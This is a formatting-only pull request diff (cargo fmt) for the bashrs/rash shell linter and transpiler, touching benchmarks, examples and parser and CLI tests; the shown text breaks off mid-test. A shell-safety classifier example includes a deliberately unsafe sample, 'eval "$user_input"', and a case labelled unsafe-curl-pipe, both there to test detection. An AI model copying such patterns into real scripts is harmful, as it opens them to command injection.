### PR TITLE
style: cargo fmt (unified CI prep)

### DIFF
--- a/rash/benches/transpilation.rs
+++ b/rash/benches/transpilation.rs
@@ -139,11 +139,9 @@ fn benchmark_emission(c: &mut Criterion) {
     )
     .unwrap();
 
-    group.bench_with_input(
-        BenchmarkId::new("emit", "simple"),
-        &simple_ir,
-        |b, ir| b.iter(|| bashrs::emitter::emit(ir).unwrap()),
-    );
+    group.bench_with_input(BenchmarkId::new("emit", "simple"), &simple_ir, |b, ir| {
+        b.iter(|| bashrs::emitter::emit(ir).unwrap())
+    });
 
     group.finish();
 }

--- a/rash/examples/conversation_generator.rs
+++ b/rash/examples/conversation_generator.rs
@@ -7,8 +7,8 @@
 #![allow(clippy::unwrap_used)]
 
 use bashrs::corpus::conversations::{
-    generate_batch, to_jsonl, ConversationInput, ConversationType, QualityReport,
-    generate_conversation,
+    generate_batch, generate_conversation, to_jsonl, ConversationInput, ConversationType,
+    QualityReport,
 };
 use bashrs::linter::lint_shell;
 
@@ -88,10 +88,7 @@ fn show_conversation(script: &str, seed: u64) {
     print_conversation(&conv.conversation_type, &conv.turns);
 }
 
-fn print_conversation(
-    conv_type: &ConversationType,
-    turns: &[bashrs::corpus::conversations::Turn],
-) {
+fn print_conversation(conv_type: &ConversationType, turns: &[bashrs::corpus::conversations::Turn]) {
     println!("  Type: {:?}", conv_type);
     for turn in turns {
         let preview = if turn.content.len() > 200 {

--- a/rash/examples/evaluation_metrics.rs
+++ b/rash/examples/evaluation_metrics.rs
@@ -13,10 +13,7 @@ fn main() {
     println!("=== SSC v11 Evaluation Metrics (Section 5.5) ===\n");
 
     // Perfect classifier
-    let perfect = evaluate(
-        &[(1, 1), (0, 0), (1, 1), (0, 0), (1, 1), (0, 0)],
-        "perfect",
-    );
+    let perfect = evaluate(&[(1, 1), (0, 0), (1, 1), (0, 0), (1, 1), (0, 0)], "perfect");
 
     // Good classifier (1 false positive, 1 false negative)
     let good = evaluate(
@@ -31,15 +28,15 @@ fn main() {
     );
 
     // Random-ish classifier
-    let random = evaluate(
-        &[(1, 0), (0, 1), (1, 1), (0, 0), (1, 0), (0, 1)],
-        "random",
-    );
+    let random = evaluate(&[(1, 0), (0, 1), (1, 1), (0, 0), (1, 0), (0, 1)], "random");
 
     let reports = [&perfect, &good, &majority, &random];
 
     // Side-by-side comparison
-    println!("{}", format_comparison(&reports.iter().map(|r| (*r).clone()).collect::<Vec<_>>()));
+    println!(
+        "{}",
+        format_comparison(&reports.iter().map(|r| (*r).clone()).collect::<Vec<_>>())
+    );
     println!();
 
     // Detailed reports

--- a/rash/examples/fast_classify_export.rs
+++ b/rash/examples/fast_classify_export.rs
@@ -123,8 +123,14 @@ fn main() {
     eprintln!("Wrote {} rows to {}", all_rows.len(), corpus_path.display());
     eprintln!();
     eprintln!("Next: use alimentar for splitting:");
-    eprintln!("  alimentar convert {0}/corpus.jsonl {0}/corpus.parquet", output_dir);
-    eprintln!("  alimentar fed manifest {0}/corpus.parquet -o {0}/manifest.json -n bashrs", output_dir);
+    eprintln!(
+        "  alimentar convert {0}/corpus.jsonl {0}/corpus.parquet",
+        output_dir
+    );
+    eprintln!(
+        "  alimentar fed manifest {0}/corpus.parquet -o {0}/manifest.json -n bashrs",
+        output_dir
+    );
     eprintln!("  alimentar fed plan {0}/manifest.json -o {0}/plan.json -s stratified -r 0.8 --test-ratio 0.1 --validation-ratio 0.1 --stratify-column label", output_dir);
     eprintln!("  alimentar fed split {0}/corpus.parquet -p {0}/plan.json -n bashrs --train-output {0}/train.parquet --test-output {0}/test.parquet --validation-output {0}/val.parquet", output_dir);
 }

--- a/rash/examples/generalization_tests.rs
+++ b/rash/examples/generalization_tests.rs
@@ -20,31 +20,31 @@ fn main() {
     for t in &tests {
         let result = lint_shell(t.script);
         let has_findings = !result.diagnostics.is_empty();
-        let has_security = result
-            .diagnostics
-            .iter()
-            .any(|d| d.code.starts_with("SEC"));
+        let has_security = result.diagnostics.iter().any(|d| d.code.starts_with("SEC"));
         let detected = has_security || has_findings;
 
         if detected {
             caught += 1;
         } else {
             missed += 1;
-            println!(
-                "  MISSED: {} [{}] — {}",
-                t.id, t.category, t.description
-            );
+            println!("  MISSED: {} [{}] — {}", t.id, t.category, t.description);
             println!("    Script: {}", t.script.lines().next().unwrap_or(""));
         }
     }
 
     println!("\n=== Results ===\n");
     println!("  Total:   {}", tests.len());
-    println!("  Caught:  {} ({:.1}%)", caught, caught as f64 / tests.len() as f64 * 100.0);
-    println!("  Missed:  {} ({:.1}%)", missed, missed as f64 / tests.len() as f64 * 100.0);
     println!(
-        "  Target:  >= 50% (SSC v11 Section 5.5: generalization >= 50%)"
+        "  Caught:  {} ({:.1}%)",
+        caught,
+        caught as f64 / tests.len() as f64 * 100.0
     );
+    println!(
+        "  Missed:  {} ({:.1}%)",
+        missed,
+        missed as f64 / tests.len() as f64 * 100.0
+    );
+    println!("  Target:  >= 50% (SSC v11 Section 5.5: generalization >= 50%)");
     println!(
         "  Status:  {}",
         if caught as f64 / tests.len() as f64 >= 0.5 {

--- a/rash/examples/label_audit.rs
+++ b/rash/examples/label_audit.rs
@@ -19,9 +19,7 @@ fn main() {
         report.genuinely_unsafe, report.accuracy_pct
     );
     println!("  False positives:  {}", report.false_positives);
-    println!(
-        "  Target:           >= 90% (C-LABEL-001)"
-    );
+    println!("  Target:           >= 90% (C-LABEL-001)");
     println!(
         "  Status:           {}",
         if report.passed { "PASSED" } else { "FAILED" }

--- a/rash/examples/linting_demo.rs
+++ b/rash/examples/linting_demo.rs
@@ -201,10 +201,7 @@ const SIMULATION_TESTS: &[(&str, &str, &str)] = &[
 ];
 
 fn find_bashrs_binary() -> Option<&'static str> {
-    let candidates = [
-        "target/release/bashrs",
-        "target/debug/bashrs",
-    ];
+    let candidates = ["target/release/bashrs", "target/debug/bashrs"];
     candidates
         .iter()
         .find(|p| std::path::Path::new(p).exists())

--- a/rash/examples/shell_safety_classifier.rs
+++ b/rash/examples/shell_safety_classifier.rs
@@ -42,7 +42,10 @@ fn classify_and_print(name: &str, script: &str) {
 
     if !diagnostics.is_empty() {
         for d in diagnostics.iter().take(3) {
-            println!("      - {}: {} (line {})", d.code, d.message, d.span.start_line);
+            println!(
+                "      - {}: {} (line {})",
+                d.code, d.message, d.span.start_line
+            );
         }
         if diagnostics.len() > 3 {
             println!("      ... and {} more", diagnostics.len() - 3);
@@ -59,10 +62,7 @@ fn main() {
         "#!/bin/sh\nset -euf\necho \"Hello, World!\"\nmkdir -p /tmp/build\n",
     );
 
-    classify_and_print(
-        "needs-quoting",
-        "#!/bin/sh\necho $HOME\ncd $WORKSPACE\n",
-    );
+    classify_and_print("needs-quoting", "#!/bin/sh\necho $HOME\ncd $WORKSPACE\n");
 
     classify_and_print(
         "non-deterministic",
@@ -74,10 +74,7 @@ fn main() {
         "#!/bin/sh\nmkdir /tmp/build\nln -s /usr/bin/app /usr/local/bin/app\n",
     );
 
-    classify_and_print(
-        "unsafe-eval",
-        "#!/bin/bash\neval \"$user_input\"\n",
-    );
+    classify_and_print("unsafe-eval", "#!/bin/bash\neval \"$user_input\"\n");
 
     classify_and_print(
         "unsafe-curl-pipe",

--- a/rash/examples/tokenizer_validation.rs
+++ b/rash/examples/tokenizer_validation.rs
@@ -14,7 +14,10 @@ fn main() {
 
     // Show the 20 critical constructs
     let constructs = shell_constructs();
-    println!("Shell constructs to validate ({} total):\n", constructs.len());
+    println!(
+        "Shell constructs to validate ({} total):\n",
+        constructs.len()
+    );
     for c in &constructs {
         println!("  {}: {:30} — {}", c.id, c.construct, c.description);
     }
@@ -29,7 +32,10 @@ fn main() {
     });
 
     println!("Total constructs: {}", report.total_constructs);
-    println!("Acceptable:       {} ({:.1}%)", report.acceptable_count, report.acceptable_pct);
+    println!(
+        "Acceptable:       {} ({:.1}%)",
+        report.acceptable_count, report.acceptable_pct
+    );
     println!("Unacceptable:     {}", report.unacceptable_count);
     println!("Target:           >= 70% (C-TOK-001)");
     println!(
@@ -55,14 +61,16 @@ fn main() {
 
     // Now run with a character-level tokenizer (should fail)
     println!("\n--- Character Tokenizer (should fail) ---\n");
-    let bad_report = run_validation(|construct| {
-        construct.chars().map(|c| c.to_string()).collect()
-    });
+    let bad_report = run_validation(|construct| construct.chars().map(|c| c.to_string()).collect());
 
     println!(
         "Acceptable: {} ({:.1}%) — {}",
         bad_report.acceptable_count,
         bad_report.acceptable_pct,
-        if bad_report.passed { "PASSED" } else { "FAILED (expected)" }
+        if bad_report.passed {
+            "PASSED"
+        } else {
+            "FAILED (expected)"
+        }
     );
 }

--- a/rash/src/bash_parser/lexer_operator_tests.rs
+++ b/rash/src/bash_parser/lexer_operator_tests.rs
@@ -112,11 +112,7 @@ fn test_LEX_OP_REGEX_002_regex_pattern_content() {
     let regex_tok = tokens
         .iter()
         .find(|t| matches!(t, Token::Identifier(s) if s.starts_with("=~ ")));
-    assert!(
-        regex_tok.is_some(),
-        "Expected =~ token, got: {:?}",
-        tokens
-    );
+    assert!(regex_tok.is_some(), "Expected =~ token, got: {:?}", tokens);
     if let Some(Token::Identifier(s)) = regex_tok {
         assert!(
             s.contains("foo.*bar"),
@@ -427,10 +423,7 @@ fn test_LEX_OP_NOT_002_ne_operator() {
     let tokens = lex("[ $a != $b ]");
     assert!(tokens.iter().any(|t| matches!(t, Token::Ne)));
     // Should not have separate Not token for !=
-    let not_count = tokens
-        .iter()
-        .filter(|t| matches!(t, Token::Not))
-        .count();
+    let not_count = tokens.iter().filter(|t| matches!(t, Token::Not)).count();
     assert_eq!(
         not_count, 0,
         "!= should be a single Ne token, not separate Not, got: {:?}",
@@ -447,10 +440,7 @@ fn test_LEX_OP_PIPE_001_or_not_confused_with_pipe() {
     // || should produce Or, not two Pipes
     let tokens = lex("cmd1 || cmd2");
     assert!(tokens.iter().any(|t| matches!(t, Token::Or)));
-    let pipe_count = tokens
-        .iter()
-        .filter(|t| matches!(t, Token::Pipe))
-        .count();
+    let pipe_count = tokens.iter().filter(|t| matches!(t, Token::Pipe)).count();
     assert_eq!(
         pipe_count, 0,
         "|| should not produce standalone Pipe tokens, got {}: {:?}",
@@ -461,10 +451,7 @@ fn test_LEX_OP_PIPE_001_or_not_confused_with_pipe() {
 #[test]
 fn test_LEX_OP_PIPE_002_multiple_pipes() {
     let tokens = lex("a | b | c | d");
-    let pipe_count = tokens
-        .iter()
-        .filter(|t| matches!(t, Token::Pipe))
-        .count();
+    let pipe_count = tokens.iter().filter(|t| matches!(t, Token::Pipe)).count();
     assert_eq!(
         pipe_count, 3,
         "Expected 3 pipes, got {}: {:?}",
@@ -481,13 +468,25 @@ fn test_LEX_OP_BRACKET_001_single_vs_double_brackets() {
     let tokens_single = lex("[ -f file ]");
     let tokens_double = lex("[[ -f file ]]");
 
-    assert!(tokens_single.iter().any(|t| matches!(t, Token::LeftBracket)));
-    assert!(tokens_single.iter().any(|t| matches!(t, Token::RightBracket)));
-    assert!(!tokens_single.iter().any(|t| matches!(t, Token::DoubleLeftBracket)));
+    assert!(tokens_single
+        .iter()
+        .any(|t| matches!(t, Token::LeftBracket)));
+    assert!(tokens_single
+        .iter()
+        .any(|t| matches!(t, Token::RightBracket)));
+    assert!(!tokens_single
+        .iter()
+        .any(|t| matches!(t, Token::DoubleLeftBracket)));
 
-    assert!(tokens_double.iter().any(|t| matches!(t, Token::DoubleLeftBracket)));
-    assert!(tokens_double.iter().any(|t| matches!(t, Token::DoubleRightBracket)));
-    assert!(!tokens_double.iter().any(|t| matches!(t, Token::LeftBracket)));
+    assert!(tokens_double
+        .iter()
+        .any(|t| matches!(t, Token::DoubleLeftBracket)));
+    assert!(tokens_double
+        .iter()
+        .any(|t| matches!(t, Token::DoubleRightBracket)));
+    assert!(!tokens_double
+        .iter()
+        .any(|t| matches!(t, Token::LeftBracket)));
 }
 
 // ============================================================================
@@ -552,14 +551,12 @@ fn test_LEX_OP_COMPOUND_002_conditional_with_assignment() {
     assert!(tokens.iter().any(|t| matches!(t, Token::Eq)));
     assert!(tokens.iter().any(|t| matches!(t, Token::And)));
     assert!(tokens.iter().any(|t| matches!(t, Token::Or)));
-    let assign_count = tokens
-        .iter()
-        .filter(|t| matches!(t, Token::Assign))
-        .count();
+    let assign_count = tokens.iter().filter(|t| matches!(t, Token::Assign)).count();
     assert!(
         assign_count >= 2,
         "Expected at least 2 assignments, got {}: {:?}",
-        assign_count, tokens
+        assign_count,
+        tokens
     );
 }
 
@@ -570,11 +567,9 @@ fn test_LEX_OP_COMPOUND_003_all_redirect_types_in_one() {
     assert!(tokens.iter().any(|t| matches!(t, Token::Lt)));
     assert!(tokens.iter().any(|t| matches!(t, Token::Gt)));
     assert!(tokens.iter().any(|t| matches!(t, Token::GtGt)));
-    assert!(
-        tokens
-            .iter()
-            .any(|t| matches!(t, Token::Identifier(s) if s == ">|"))
-    );
+    assert!(tokens
+        .iter()
+        .any(|t| matches!(t, Token::Identifier(s) if s == ">|")));
 }
 
 #[test]
@@ -665,9 +660,7 @@ fn test_LEX_OP_REDIR_006_readwrite_no_spaces() {
 fn test_LEX_OP_HSTR_001_herestring_double_quoted() {
     let tokens = lex("cat <<< \"hello world\"");
     assert!(
-        tokens
-            .iter()
-            .any(|t| matches!(t, Token::HereString(_))),
+        tokens.iter().any(|t| matches!(t, Token::HereString(_))),
         "Expected HereString token with double-quoted input, got: {:?}",
         tokens
     );
@@ -677,9 +670,7 @@ fn test_LEX_OP_HSTR_001_herestring_double_quoted() {
 fn test_LEX_OP_HSTR_002_herestring_unquoted() {
     let tokens = lex("cat <<< word");
     assert!(
-        tokens
-            .iter()
-            .any(|t| matches!(t, Token::HereString(_))),
+        tokens.iter().any(|t| matches!(t, Token::HereString(_))),
         "Expected HereString token with unquoted word, got: {:?}",
         tokens
     );

--- a/rash/src/bash_parser/parser_arith_tests.rs
+++ b/rash/src/bash_parser/parser_arith_tests.rs
@@ -43,10 +43,7 @@ fn test_arith_number() {
 
 #[test]
 fn test_arith_variable() {
-    assert_eq!(
-        parse_arith("x"),
-        ArithExpr::Variable("x".to_string()),
-    );
+    assert_eq!(parse_arith("x"), ArithExpr::Variable("x".to_string()),);
 }
 
 #[test]
@@ -394,19 +391,13 @@ fn test_arith_power_right_associative() {
 fn test_arith_comma() {
     // x , y => returns y (comma evaluates both but returns the rightmost)
     // With variables this is simplified: comma discards left, returns right
-    assert_eq!(
-        parse_arith("1,2"),
-        ArithExpr::Number(2),
-    );
+    assert_eq!(parse_arith("1,2"), ArithExpr::Number(2),);
 }
 
 #[test]
 fn test_arith_comma_chain() {
     // 1 , 2 , 3 => Number(3)
-    assert_eq!(
-        parse_arith("1,2,3"),
-        ArithExpr::Number(3),
-    );
+    assert_eq!(parse_arith("1,2,3"), ArithExpr::Number(3),);
 }
 
 // ===========================================================================
@@ -666,10 +657,7 @@ fn test_tokenize_bitwise_not() {
 #[test]
 fn test_tokenize_underscore_variable() {
     let tokens = tokenize("_my_var");
-    assert_eq!(
-        tokens,
-        vec![ArithToken::Variable("_my_var".to_string())],
-    );
+    assert_eq!(tokens, vec![ArithToken::Variable("_my_var".to_string())],);
 }
 
 // ===========================================================================

--- a/rash/src/bash_parser/parser_control_cov_tests.rs
+++ b/rash/src/bash_parser/parser_control_cov_tests.rs
@@ -20,7 +20,10 @@ use super::parser::BashParser;
 
 fn parse_ok(input: &str) {
     let result = BashParser::new(input).and_then(|mut p| p.parse());
-    assert!(result.is_ok(), "Expected parse OK for: {input}\nGot: {result:?}");
+    assert!(
+        result.is_ok(),
+        "Expected parse OK for: {input}\nGot: {result:?}"
+    );
 }
 
 fn parse_ok_result(input: &str) -> super::ast::BashAst {
@@ -84,7 +87,9 @@ fn test_PCCOV_010_for_c_style_with_number_token() {
 
 #[test]
 fn test_PCCOV_011_for_c_style_with_nested_body() {
-    parse_ok("for ((i=0; i<5; i++)); do\n  for ((j=0; j<3; j++)); do\n    echo $i $j\n  done\ndone");
+    parse_ok(
+        "for ((i=0; i<5; i++)); do\n  for ((j=0; j<3; j++)); do\n    echo $i $j\n  done\ndone",
+    );
 }
 
 #[test]
@@ -193,7 +198,9 @@ fn test_PCCOV_026_select_single_item() {
 
 #[test]
 fn test_PCCOV_027_case_basic() {
-    parse_ok("case $x in\n  start) echo starting;;\n  stop) echo stopping;;\n  *) echo unknown;;\nesac");
+    parse_ok(
+        "case $x in\n  start) echo starting;;\n  stop) echo stopping;;\n  *) echo unknown;;\nesac",
+    );
 }
 
 #[test]

--- a/rash/src/bash_parser/parser_expr_tests.rs
+++ b/rash/src/bash_parser/parser_expr_tests.rs
@@ -234,20 +234,14 @@ fn test_parse_var_expansion_substitution_single() {
     // expansion operator, so it becomes a plain Variable.
     let result = expand("var/old/new");
     // No substitution handler — treated as variable name
-    assert_eq!(
-        result,
-        BashExpr::Variable("var/old/new".to_string()),
-    );
+    assert_eq!(result, BashExpr::Variable("var/old/new".to_string()),);
 }
 
 #[test]
 fn test_parse_var_expansion_global_substitution() {
     // ${var//pattern/replacement} — same as above, no handler
     let result = expand("var//old/new");
-    assert_eq!(
-        result,
-        BashExpr::Variable("var//old/new".to_string()),
-    );
+    assert_eq!(result, BashExpr::Variable("var//old/new".to_string()),);
 }
 
 // ===========================================================================

--- a/rash/src/bash_transpiler/purification/control_flow_coverage_tests.rs
+++ b/rash/src/bash_transpiler/purification/control_flow_coverage_tests.rs
@@ -153,7 +153,10 @@ fn test_purify_with_type_check_enabled() {
 
     let mut purifier = Purifier::new(opts);
     let _purified = purifier.purify(&ast).expect("should succeed");
-    assert!(purifier.type_checker().is_some(), "type checker should be set");
+    assert!(
+        purifier.type_checker().is_some(),
+        "type checker should be set"
+    );
 }
 
 #[test]
@@ -392,11 +395,7 @@ fn test_purify_ln_gets_sf_flag() {
                 .iter()
                 .any(|a| matches!(a, BashExpr::Literal(s) if s == "-s"));
             // Should have either -sf or -s and -f
-            assert!(
-                has_sf || has_s,
-                "ln should have -sf or -s: {:?}",
-                args
-            );
+            assert!(has_sf || has_s, "ln should have -sf or -s: {:?}", args);
         }
         _ => panic!("Expected command"),
     }

--- a/rash/src/bash_transpiler/purification/mod.rs
+++ b/rash/src/bash_transpiler/purification/mod.rs
@@ -11,9 +11,9 @@ use std::collections::HashSet;
 use thiserror::Error;
 
 mod commands;
+mod conditional_exprs;
 mod control_flow;
 mod expressions;
-mod conditional_exprs;
 
 #[cfg(test)]
 #[allow(clippy::expect_used)]

--- a/rash/src/cli/command_tests_corpus_cov.rs
+++ b/rash/src/cli/command_tests_corpus_cov.rs
@@ -142,10 +142,8 @@ fn test_cov_drift_print_format_empty() {
 
 #[test]
 fn test_cov_classify_b2_only_false_positive() {
-    let (cat, _best) = super::corpus_b2_commands::classify_b2_only(
-        "echo hello",
-        "echo hello\nsome other line\n",
-    );
+    let (cat, _best) =
+        super::corpus_b2_commands::classify_b2_only("echo hello", "echo hello\nsome other line\n");
     assert_eq!(cat, "false_positive");
 }
 
@@ -169,10 +167,8 @@ fn test_cov_classify_b2_only_multiline_mismatch() {
 
 #[test]
 fn test_cov_classify_b2_only_line_wider() {
-    let (cat, _best) = super::corpus_b2_commands::classify_b2_only(
-        "echo",
-        "echo hello world from the shell\n",
-    );
+    let (cat, _best) =
+        super::corpus_b2_commands::classify_b2_only("echo", "echo hello world from the shell\n");
     assert_eq!(cat, "line_wider");
 }
 
@@ -202,18 +198,23 @@ fn test_cov_classify_b1b2_no_output_non_echo() {
 
 #[test]
 fn test_cov_classify_b1b2_partial_match() {
-    let cat = super::corpus_b2_commands::classify_b1b2(
-        "echo hello world",
-        "echo hello planet\n",
-    );
+    let cat = super::corpus_b2_commands::classify_b1b2("echo hello world", "echo hello planet\n");
     assert!(!cat.is_empty());
 }
 
 #[test]
 fn test_cov_print_b2_category() {
     let items = vec![
-        ("B-001".to_string(), "echo hello".to_string(), "echo hello world".to_string()),
-        ("B-002".to_string(), "echo foo".to_string(), "echo foo bar".to_string()),
+        (
+            "B-001".to_string(),
+            "echo hello".to_string(),
+            "echo hello world".to_string(),
+        ),
+        (
+            "B-002".to_string(),
+            "echo foo".to_string(),
+            "echo foo bar".to_string(),
+        ),
     ];
     super::corpus_b2_commands::print_b2_category("test_cat", &items, 5);
 }
@@ -262,7 +263,9 @@ fn test_cov_extract_main_body_makefile() {
 
 #[test]
 fn test_cov_extract_noncomment_lines() {
-    let lines = super::corpus_b2_commands::extract_noncomment_lines("# comment\nFROM ubuntu\n\nRUN echo hi\n");
+    let lines = super::corpus_b2_commands::extract_noncomment_lines(
+        "# comment\nFROM ubuntu\n\nRUN echo hi\n",
+    );
     assert_eq!(lines.len(), 2);
 }
 
@@ -272,8 +275,12 @@ fn test_cov_is_bash_preamble() {
     assert!(super::corpus_b2_commands::is_bash_preamble("#!/bin/sh"));
     assert!(super::corpus_b2_commands::is_bash_preamble("set -euf"));
     assert!(super::corpus_b2_commands::is_bash_preamble("IFS=$'\\n'"));
-    assert!(super::corpus_b2_commands::is_bash_preamble("export PATH=/usr/bin"));
-    assert!(super::corpus_b2_commands::is_bash_preamble("trap cleanup EXIT"));
+    assert!(super::corpus_b2_commands::is_bash_preamble(
+        "export PATH=/usr/bin"
+    ));
+    assert!(super::corpus_b2_commands::is_bash_preamble(
+        "trap cleanup EXIT"
+    ));
     assert!(super::corpus_b2_commands::is_bash_preamble("main \"$@\""));
     assert!(!super::corpus_b2_commands::is_bash_preamble("echo hello"));
 }
@@ -291,20 +298,34 @@ fn test_cov_advance_bash_body_state() {
 
     let mut out = Vec::new();
 
-    let state = super::corpus_b2_commands::advance_bash_body_state("rash_println() {", BashBodyState::Before, &mut out);
+    let state = super::corpus_b2_commands::advance_bash_body_state(
+        "rash_println() {",
+        BashBodyState::Before,
+        &mut out,
+    );
     assert!(state == BashBodyState::InFuncDef);
 
-    let state = super::corpus_b2_commands::advance_bash_body_state("}", BashBodyState::InFuncDef, &mut out);
+    let state =
+        super::corpus_b2_commands::advance_bash_body_state("}", BashBodyState::InFuncDef, &mut out);
     assert!(state == BashBodyState::Before);
 
-    let state = super::corpus_b2_commands::advance_bash_body_state("main() {", BashBodyState::Before, &mut out);
+    let state = super::corpus_b2_commands::advance_bash_body_state(
+        "main() {",
+        BashBodyState::Before,
+        &mut out,
+    );
     assert!(state == BashBodyState::InMain);
 
-    let state = super::corpus_b2_commands::advance_bash_body_state("echo hello", BashBodyState::InMain, &mut out);
+    let state = super::corpus_b2_commands::advance_bash_body_state(
+        "echo hello",
+        BashBodyState::InMain,
+        &mut out,
+    );
     assert!(state == BashBodyState::InMain);
     assert_eq!(out.len(), 1);
 
-    let state = super::corpus_b2_commands::advance_bash_body_state("}", BashBodyState::InMain, &mut out);
+    let state =
+        super::corpus_b2_commands::advance_bash_body_state("}", BashBodyState::InMain, &mut out);
     assert!(state == BashBodyState::Before);
 }
 
@@ -322,10 +343,7 @@ fn test_cov_find_best_token_match() {
 
 #[test]
 fn test_cov_find_best_token_match_no_overlap() {
-    let lines = vec![
-        "aaaa=1".to_string(),
-        "bbbb=2".to_string(),
-    ];
+    let lines = vec!["aaaa=1".to_string(), "bbbb=2".to_string()];
     let result = super::corpus_b2_commands::find_best_token_match("zzzz unique", &lines);
     assert!(result.is_some());
 }

--- a/rash/src/cli/command_tests_installer_cov.rs
+++ b/rash/src/cli/command_tests_installer_cov.rs
@@ -63,9 +63,7 @@ mod installer_init_cmd {
             name,
             description: None,
         };
-        assert!(
-            super::super::super::installer_commands::handle_installer_command(cmd).is_ok()
-        );
+        assert!(super::super::super::installer_commands::handle_installer_command(cmd).is_ok());
     }
 }
 
@@ -79,9 +77,7 @@ mod installer_validate_cmd {
     #[test]
     fn test_cov_installer_validate_ok() {
         let (_dir, project_path) = super::make_installer_project();
-        let cmd = InstallerCommands::Validate {
-            path: project_path,
-        };
+        let cmd = InstallerCommands::Validate { path: project_path };
         let res = super::super::super::installer_commands::handle_installer_command(cmd);
         assert!(res.is_ok(), "validate failed: {:?}", res);
     }
@@ -243,7 +239,11 @@ mod installer_test_cmd {
             coverage: true,
         };
         let res = super::super::super::installer_commands::handle_installer_command(cmd);
-        assert!(res.is_ok(), "installer test with coverage failed: {:?}", res);
+        assert!(
+            res.is_ok(),
+            "installer test with coverage failed: {:?}",
+            res
+        );
     }
 
     #[test]
@@ -1109,17 +1109,20 @@ mod corpus_core_smoke {
     fn test_cov_corpus_generate_report_to_file() {
         let dir = tempfile::tempdir().unwrap();
         let path = dir.path().join("report.md");
-        let _ = super::super::corpus_diff_commands::corpus_generate_report(
-            Some(path.to_str().unwrap()),
-        );
+        let _ = super::super::corpus_diff_commands::corpus_generate_report(Some(
+            path.to_str().unwrap(),
+        ));
     }
 
     #[test]
     fn test_cov_corpus_show_diff_no_log() {
         use crate::cli::args::CorpusOutputFormat;
         // No convergence log → should return error (fast: no corpus load)
-        let res =
-            super::super::corpus_diff_commands::corpus_show_diff(&CorpusOutputFormat::Human, None, None);
+        let res = super::super::corpus_diff_commands::corpus_show_diff(
+            &CorpusOutputFormat::Human,
+            None,
+            None,
+        );
         let _ = res;
     }
 

--- a/rash/src/cli/command_tests_lint_cov.rs
+++ b/rash/src/cli/command_tests_lint_cov.rs
@@ -591,16 +591,15 @@ fn test_cov_comply_check_default() {
     // Create a simple shell script for the checker to find
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\nset -eu\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Check {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Check {
             path: dir.path().to_path_buf(),
             scope: None,
             strict: false,
             failures_only: false,
             min_score: None,
             format: crate::cli::args::ComplyFormat::Text,
-        },
-    );
+        });
     // Check command should succeed (may have low score but no error)
     let _ = result;
 }
@@ -611,16 +610,15 @@ fn test_cov_comply_check_json() {
     let dir = TempDir::new().unwrap();
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Check {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Check {
             path: dir.path().to_path_buf(),
             scope: None,
             strict: false,
             failures_only: false,
             min_score: None,
             format: crate::cli::args::ComplyFormat::Json,
-        },
-    );
+        });
     let _ = result;
 }
 
@@ -630,16 +628,15 @@ fn test_cov_comply_check_markdown() {
     let dir = TempDir::new().unwrap();
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Check {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Check {
             path: dir.path().to_path_buf(),
             scope: None,
             strict: false,
             failures_only: false,
             min_score: None,
             format: crate::cli::args::ComplyFormat::Markdown,
-        },
-    );
+        });
     let _ = result;
 }
 
@@ -649,16 +646,15 @@ fn test_cov_comply_check_failures_only() {
     let dir = TempDir::new().unwrap();
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Check {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Check {
             path: dir.path().to_path_buf(),
             scope: Some(crate::cli::args::ComplyScopeArg::Project),
             strict: false,
             failures_only: true,
             min_score: None,
             format: crate::cli::args::ComplyFormat::Text,
-        },
-    );
+        });
     let _ = result;
 }
 
@@ -668,16 +664,15 @@ fn test_cov_comply_check_min_score() {
     let dir = TempDir::new().unwrap();
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Check {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Check {
             path: dir.path().to_path_buf(),
             scope: None,
             strict: false,
             failures_only: false,
             min_score: Some(100), // Intentionally high — may fail
             format: crate::cli::args::ComplyFormat::Text,
-        },
-    );
+        });
     // High min_score on empty project will likely fail — that's fine for coverage
     let _ = result;
 }
@@ -688,12 +683,11 @@ fn test_cov_comply_status() {
     let dir = TempDir::new().unwrap();
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Status {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Status {
             path: dir.path().to_path_buf(),
             format: crate::cli::args::ComplyFormat::Text,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
@@ -703,45 +697,41 @@ fn test_cov_comply_status_json() {
     let dir = TempDir::new().unwrap();
     fs::write(dir.path().join("test.sh"), "#!/bin/sh\necho ok\n").unwrap();
 
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Status {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Status {
             path: dir.path().to_path_buf(),
             format: crate::cli::args::ComplyFormat::Json,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
 /// Test comply rules command (text format).
 #[test]
 fn test_cov_comply_rules_text() {
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Rules {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Rules {
             format: crate::cli::args::ComplyFormat::Text,
-        },
-    );
+        });
     assert!(result.is_ok());
 }
 
 /// Test comply rules command (JSON format).
 #[test]
 fn test_cov_comply_rules_json() {
-    let result = super::comply_cmds::handle_comply_command(
-        crate::cli::args::ComplyCommands::Rules {
+    let result =
+        super::comply_cmds::handle_comply_command(crate::cli::args::ComplyCommands::Rules {
